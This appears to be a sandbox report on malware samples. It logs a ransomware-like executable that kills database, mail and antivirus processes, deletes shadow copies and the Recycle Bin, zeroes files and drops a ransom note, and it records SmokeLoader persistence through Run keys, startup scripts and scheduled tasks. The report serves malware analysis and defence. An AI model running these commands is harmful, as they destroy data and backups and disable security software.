PID 5868 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5724 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5724 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5972 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5972 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5656 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\cmd.exe
PID 5868 wrote to memory of 5656 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\cmd.exe
PID 5868 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5384 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5384 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqbcoreservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM firefoxconfig.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM agntsvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM thebat.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM steam.exe /F

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM encsvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM excel.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM CNTAoSMgr.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlwriter.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM tbirdconfig.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM dbeng50.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM thebat64.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocomm.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM infopath.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mbamtray.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM zoolz.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" IM thunderbird.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM dbsnmp.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM xfssvccon.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM Ntrtscan.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM isqlplussvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM onenote.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM PccNTMon.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM msaccess.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM outlook.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM tmlisten.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM msftesql.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM powerpnt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM visio.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM winword.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld-nt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM wordpad.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld-opt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocautoupds.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocssd.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM oracle.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlagent.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlbrowser.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlservr.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM synctime.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/5868-0-0x00007FFCE4B23000-0x00007FFCE4B25000-memory.dmp

memory/5868-1-0x0000000000460000-0x000000000047A000-memory.dmp

memory/5868-2-0x00007FFCE4B20000-0x00007FFCE55E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x0v4sv2x.erg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/6024-26-0x000002EE72640000-0x000002EE72662000-memory.dmp

C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]

MD5 2655405a33e066dde607c60e36b4c8b9
SHA1 f7bc0862eaafdda06b33c45de8a543e26e22262b
SHA256 fbe5bae770bce80c9699b918a347b3a3683eeb7ca3fa38ec337f3fd08965aaea
SHA512 3a382c8d7b3f2aab1e7452137e32762040794e052460148d48415bef051873a74b011b3f8b02b629b6b6fa5b60a40d2234eb33beb5f7548eb37ca98981ee946e

C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi

MD5 e1e8698145f7c1ae7f1c5ebe079b13ef
SHA1 c8abbf16311bacda66b028a039eacbc2020a229e
SHA256 c87f671ee6180d683d1c87bfd33b013d959ce9313c03a75779b5ca20001c1387
SHA512 b058ce20de6bddd5a3544e2db5c27d623ebfec4750d1d10e892179ba32af52134b9bd2af5ce6ecffb3d463fe6acd27864c02837a3684ff2282fa099a487cf962

memory/5868-147-0x00007FFCE4B23000-0x00007FFCE4B25000-memory.dmp

memory/5868-165-0x00007FFCE4B20000-0x00007FFCE55E1000-memory.dmp

C:\ProgramData\Package Cache\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}v56.64.8781\dotnet-hostfxr-7.0.16-win-x64.msi.energy[[email protected]]

MD5 dbec20383217be97a135e6c2688638f0
SHA1 94b9d716dd1d1e3c71296c3aeae74fa349a5c661
SHA256 ee216245d85807a0bca25c65c8ebec3d755bec741c569d1522ceb30d26049dd7
SHA512 95a877c518c28e80a19841a4204b1d2390635a02ddff93ed010bb7b0eec46f5739041dddd776afadfcd54321b444ad90f24ac6a02c8be94a4bfe9e0e003ba557

C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi

MD5 3080ea35e852d4931c5bd623c36c1579
SHA1 f427f25a79303745826418d9f286f8651101c244
SHA256 4f8fcfc89a2eacdbc42ba3f6e0661f81ebcf285145f02336c63423ebed490cc1
SHA512 a2b73cfbab67ca5e6f5633306a1cbc4808552e2a83adc81fa474b61f961b0feeb11d2cca79e46961b11ccbc241352b4e6a03863f0f599b1d5fd873910637a11a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 47d9df7fab0d0c96afdd2ca49f2b5030
SHA1 92583883bcf376062ddef5db2333f066d8d36612
SHA256 0f244dd39698dace2c650435886b1175ea01131e581d6c13888576c07fa40b02
SHA512 1844ce4f35849b70c246127482040986caa1bbae2d81119c77e9841f2a3280aabae0ad0db52fc29fe48023b4f4c073fe759b1f54e70e1562289d5e349c015200

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

MD5 8b0e6b329e10690fdd2a8fa8c00c1c19
SHA1 a4b8358d0fe39f9116cf7866c884270b9fa67b4d
SHA256 6e6e9634339fa105a427ef5a4754e019484213fcab61e748fac228b1cad1675a
SHA512 63c5fa09cfc3897061257e8adc76f7fe1116bfc769c52c788fa72456c910f327cf94c3b3f4feb35bbaeb988ca463ab8888976678c8a19b8de213cbc30db3916d

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

MD5 9b7f72f2f2a46d5b39f97ce8b62a53e1
SHA1 1526bebef5ee0ec24493f2c2d640f766d4c2ce08
SHA256 5a615c1135edcdaa50b5ffe954c41aa97536ff3c12768d556a19b9fe2f981843
SHA512 88e697c1f90ab057d42dd9d27db33927e3fe1bbd8ee250917b755f88e0a32ed1b0cb573af089488fda3c791cae9eef5e6cd01372e309f61509b48b53abe164e5

memory/5868-535-0x00007FFCE4B20000-0x00007FFCE55E1000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\ufx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\yaya.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\power.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDAudo.vbs C:\Users\Admin\AppData\Roaming\va.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\ersatbtf\\jsbsgjba.exe" C:\Windows\SysWOW64\explorer.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\sant.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\sant.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\HYDRA.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\va.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ufx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\power.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\yaya.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\sant.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ucp\usc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\SCHTASKS.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SCHTASKS.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
